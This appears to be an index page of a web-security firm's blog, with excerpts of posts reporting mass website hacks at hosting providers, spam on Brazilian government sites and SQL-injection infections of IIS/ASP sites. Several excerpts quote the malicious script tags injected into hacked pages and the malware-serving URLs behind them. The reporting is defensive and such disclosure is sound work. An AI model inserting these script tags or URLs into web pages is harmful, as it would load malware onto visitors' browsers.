Bluehost Talks Down Malware Percentages – Offers Sucuri a Forum Ban

On Sunday we reported that a number of sites hosted by Bluehost had been hacked (including their CEO’s blog).

On Monday while browsing through some of their forums, we noticed a thread regarding the exploit with remarks from forum moderators and administrators to curious customers that didn’t quite make sense.

#1 from one moderator:

Since such a negligible percentage of Bluehost sites were hacked it is just about guaranteed that it is an individual script issue rather than anything more widespread.

If it were something other than individual scripts being vulnerable then a lot more than 0.00006% of accounts would be affected.

It would be interesting to learn what Bluehost considers a negligible percentage for something like this. We’re also curious to learn more about how the .00006 percentage was determined. More on the numbers we calculated included below.

Read More

Bluehost CEO blog & others exploited by domainameat.cc

We’re seeing that a good number of sites hosted at Bluehost have been hacked and infected with malware from domainameat.cc. The blog of Matt Heaton, CEO of Bluehost was also exploited (mattheaton.com).

After analyzing some of these sites, they were all hacked around 9/10am this morning. This is the malware script showing up at the bottom of the sites:

< script src = ” http://domainameat.cc/ js2.php “< </script>

This is the report from our scanner against their CEO’s blog:

Read More

Brazilian Government Websites Hacked with Spam

In the last few months we’ve been tracking a common technique being used by attackers: They hack a web site and use that as part of their link farm to build page rank for them on search engines. We posted many articles about similar spam issues in the past.

Recently, we’ve started to notice a lot of government web sites from Brazil in this list.

Some are fairly big sites:

http://www.ibama.gov.br – Environmental Ministry
http://www4.planalto.gov.br – Old Presidential Web site
http://www.inmetro.gov.br – Quality control ministry
http://www.cnen.gov.br – Nuclear Energy Commission
http://www.fazenda.sp.gov.br – Treasury from the state of Sao Paulo
http://inpa.gov.br – Amazon research institute
http://www.jfal.gov.br/ – Alagoas Federal Justice

http://inep.gov.br

http://ww.fundacentro.gov.br

http://www.eletrosul.gov.br

http://www.amprev.ap.gov.br

http//www.cvs.saude.sp.gov.br/

http://www.faetec.rj.gov.br

http://www.comprasnet.ba.gov.br

http://www.al.rs.gov.br

http://cmnovasoure.ba.gov.br


Read More

Web sites hacked with malware from iopap.upperdarby26.com

We are seeing today a good number of sites hacked with malware from http://iopap.upperdarby26.com. The malicious javascript is added to the bottom of every index.php file and to the bottom of a few javascript files as well.

The malware is getting loaded from a few different files, all with the same content:

http://iopap.upperdarby26.com/FIFO.js

http://iopap.upperdarby26.com/Web_Ring.js

http://iopap.upperdarby26.com/Real-Time.js

http://iopap.upperdarby26.com/Applet1.html

..

http://iopap.upperdarby26.com/Infotainment.js


Read More

Cleaning SPAM from your WordPress blog.

A common trend lately is SPAM getting added to WordPress blogs. Attackers are using this to increase their page rank on search engines like Google, Yahoo, etc.

So, if you search for your site on Google do you see a bunch of “viagra” content instead of the original title? If you click on any link from Google are you redirected to a different page? In this article we will help you understand the techniques being used by the attackers and how to clean your blog.

Getting started

The first thing you have to do is to determine if your site have been hacked. Our scanner should be able to tell you that or a Google search using your site name plus a few common spam keywords will help you identify it too. Also, if you are our client, we can get your site fixed for you, so stop reading it and send us an email.

Read More

The Mission of Security Awareness

This article was written by Christopher Vera, CISSP, HISP, GCFA, GLEG for Sucuri.

The Mission of Security Awareness

Of all the elements of a successful cyber security program, security awareness is probably one of the least understood. Some cyber security professionals have even gone as far as to claim that security awareness doesn’t work. Their observations are not entirely unfounded. The key is that successful awareness programs must provide value to their audiences. When they don’t provide value they are ignored, and thus ineffective, plain and simple. Further, a security awareness program cannot protect a user from everything. With new platform-agnostic attacks bypassing even fully patched systems with host-based firewalls and the most recent anti-virus signatures, it’s easy to throw one’s arms up in frustration. But defense in depth is one of our most trusted principles. We understand that no one security control can protect us from every threat. Otherwise, we’d have tossed out our network firewalls years ago. The advantage of a successful security awareness program is that it’s much less expensive to implement and maintain.

Read More

Attack of WordPress blogs on Rackspace

Update: It is not a “mass” attack as we described. Sorry about that. A good number of sites were affected (we don’t have a clear number yet), but nothing massive or crazy as our post sounded.

If you follow our blog, you probably noticed that these last few months have been specially hard for hosting companies. Lots of them got hacked, bringing down thousands of sites with them. Now we are hearing reports of a mass hack of WordPress blogs hosted on Rackspace.

What is going on?

The attackers were able to get access to Rackspace databases and infect the sites through there. They created a new admin user on many Worpress sites, giving them full access to the WordPress admin panel.

With that access they were able to inject malware, and as we saw before they used that to inject SEO spam to the sites.

What are the symptoms?

The first symptom that is easy to spot is new and malicious javascript files or spam on your site. Our scanner would detect them properly:

Read More

Mass infection of IIS/ASP sites – 2677.in/yahoo.js

A large number of sites have been hacked again in the last few hours with a malware script pointing to http://2677.in/yahoo.js . Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few days ago.

Some of the sites hacked this time:

http://www.ameristar.com/

http://www.servicewomen.org

http://www.chicagopublicradio.org

http://www.industryweek.com

http://www.booksellerandpublisher.com.au

http://www.spain-holiday.com

This time Google says that around 1 thousand pages have been infected. This is the content of the yahoo.js script:

Read More

GoDaddy sites hacked with cloudisthebestnow

If you thought your problems at GoDaddy were over, well, not yet.

We’ve confirmed that today at around 3pm EST, GoDaddy servers were hacked again. Malware pointing to cloudisthebestnow.com/kp.php was inserted on thousands of sites hosted by the provider.

This is how the script will look like in your pages:

< script src = http://cloudisthebestnow.com/kp.php >

It will redirect your users to that nasty “fake AV” page again. What’s interesting is that cloudisthebestnow.com is hosted and owned by the same people involved in the latest attacks at GoDaddy.

Read More

Mass infection of IIS/ASP sites – robint.us

An incredibly large number of sites have been hacked in the last day with a malware script pointing to http://ww.robint.us/u.js. Not only small sites, but some big ones got hit as well:

http://www.intljobs.org (still hacked)
http://www.servicewomen.org (still hacked)
http://online.wsj.com (partially fixed)

http://www.asbmb.org

http://www.lotl.com

http://acsi.org/

http://www.cinemathequeontario.ca

http://www.plazakvinna.com

http://www.delawareriverkeeper.org/

http://www.traveldaily.co.uk

http://www.thepaddockarea.com

http://www.ex-designz.net

http://www.historyasia.com/

http://www.montrealmetropolis.ca

http://www.charlottelive.org

http://www.cebes.org.br

How many sites got infected? According to Google over *114.000 different pages have been infected. Wow!

Read More